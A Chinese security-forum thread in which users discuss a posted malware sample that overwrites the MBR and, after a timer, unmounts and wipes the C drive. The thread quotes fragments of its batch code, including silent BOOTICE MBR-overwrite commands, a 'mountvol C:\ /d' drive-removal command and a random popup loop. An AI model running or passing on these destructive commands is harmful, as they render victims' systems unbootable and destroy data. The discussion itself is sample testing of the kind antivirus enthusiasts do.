楼主: 挚爱HNL

[病毒样本] 一个改mbr的病毒...

www-tekeze

编辑下吧,纯表回复小心被扣分。。
The_Void
www-tekeze 发表于 2018-6-13 13:13
你好,昨晚在虚拟机里试过:

1. Memory.exe无法运行,装的Win8.1 x86,我还以为得在64位系统里。 之前 ...

1.Memory.exe虽然未使用,但本身是有效的程序,您的无法运行原因不明,win7正常
2.刷屏cmd如果在随机弹窗开始的不久就出现可能是卡了,导致几次弹窗在短时间内出现,没看见IE可能是随机抽取没有抽到IE,刷屏cmd正常是在随机弹窗开始后大约2分钟出现的
3.不破坏分区表,只破坏MBR,但是从计时器开始计时(即出现2个一闪而过的cmd弹窗)后5分钟会弹出c盘分区(破坏C盘所有数据),在弹出c盘分区后想恢复就要修复分区表了
杰伦J时代
,就一个. 发表于 2018-6-12 21:39
没主防硬伤啊 如果过了就是过了 没有后续了 但是以目前红伞这个状态 我可以说是又回到了当年查杀率第一的 ...

别小看360卫士
www-tekeze
The_Void 发表于 2018-6-13 17:18
1.Memory.exe虽然未使用,但本身是有效的程序,您的无法运行原因不明,win7正常
2.刷屏cmd如果在随机弹 ...

1. 你说Win7正常,是64位的吧,32位系统有问题,你可以试下。

2. 看过你的批处理了,你本身设计确实是这样,可能我机器有点老了,又是在虚拟机里性能也会受到些影响。

if %a% LSS 5000 start explorer "about:blank"
if %a% GTR 5000 if %a% LSS 10000 start C:\Windows\regedit.exe
if %a% GTR 10000 if %a% LSS 15000 start cmd.exe
if %a% GTR 15000 goto 1

3. 用的BOOTICE来重写MBR,你也准备了个文件,但怎么没后缀名,应该是bin才对啊。

BOOTICEx64 /device=C: /mbr /restore  /file=MBR /keep_dpt /quiet
BOOTICEx86 /device=C: /mbr /restore  /file=MBR /keep_dpt /quiet

出C盘并删除装入点用的命令是: mountvol C:\ /d

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The_Void
www-tekeze 发表于 2018-6-13 19:46
1. 你说Win7正常,是64位的吧,32位系统有问题,你可以试下。

2. 看过你的批处理了,你本身设计确实是 ...

1.我确实是64位,虚拟机和实体机都一样,我创建文件的时候应该是创建了64位的程序,时间比较长,记不太清了
2.我在虚拟机里是正常的,只是drawerror失效,你可能是配置问题
3.bootice不需要后缀,所以我就没设置后缀名
The_Void
www-tekeze 发表于 2018-6-13 19:46

2. 看过你的批处理了,你本身设计确实是 ...

具体你可以看一下我的视频,全过程的
,就一个.

话里有内容
www-tekeze
The_Void 发表于 2018-6-13 20:50
1.我确实是64位,虚拟机和实体机都一样,我创建文件的时候应该是创建了64位的程序,时间比较长,记不太清 ...

1. drawerror没失效,鼠标光标变了。

2. 我的MBR就是用BOOTICE备份的,版本和你一样,1.3.3版,后缀名就是bin,你的没后缀restore也运行不了啊。

3. 最终C盘被删了,关机都关不了。
www-tekeze
The_Void 发表于 2018-6-13 20:51
具体你可以看一下我的视频,全过程的

好的,多放几个样本出来玩玩哈。。。最后说一句,多到卡饭来玩!  
有人尝试过SYMANTEC吗